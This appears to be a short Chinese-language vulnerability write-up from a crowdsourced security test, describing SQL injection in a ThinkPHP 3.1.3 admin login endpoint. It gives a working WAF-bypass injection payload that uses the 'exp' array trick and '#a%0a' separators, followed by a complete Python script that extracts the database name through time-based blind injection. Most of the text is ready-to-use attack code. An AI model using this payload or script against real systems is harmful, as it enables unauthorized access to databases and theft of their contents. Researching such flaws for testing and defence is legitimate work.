thinkphp3.1.3 sql注入 bypass

thinkphp3.1.3 bypass sql注入 这是某次众测发现的漏洞,开始发现是thinkphp3.1.3框架,尝试了下将参数变成数组形式,返回sql报错,之后就尝试绕过waf。 url:http://**/console/ 登陆处存在sql注入 存在漏洞的url:http://**/console/Admin/Index/Login.shtml 1、account参数存在sql注入,通过#a%0a可bypass waf 如下语句可造成10秒延迟,验证注入 account[]=exp&account[1]=))#a%0aunion(#a%0aselect#a%0a(#a%0aselect#a%0asleep#a%0a(10))#a%0afrom#a%0a(select#a%0asleep#a%0a(10))a)# 2、编写脚本获取数据库名: import requests import time u = "http://**/console/Admin/Index/Login.shtml" strs = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz" strs = "abcdefghijklmnopqrstuvwxyz0123456789_" headers = { "Cookie":"PHPSESSID=xxx" } sess = requests.session(); sess.headers=headers xixi ="" def check(i,s,times=1): t1 = time.time() data = { "account[]":"exp", "account[1]":"))union#a\n(select#a\n(1)from#a\n(select if#a\n(lower((mid((database()),"+str(i)+",1)))='"+s+"',sleep#a\n(4),0))a)#", "password[]":"6a", "verify":"6677", } print(s) r = sess.post(u,data=data,proxies={"http":"http://127.0.0.1:8080/"}) t = time.time()-t1 if t>4: if times==1: return check(i,s,times+1) return True return False for i in range(len(xixi)+1,50): for s in strs: if check(i,s)==True: xixi=xixi+s print(xixi)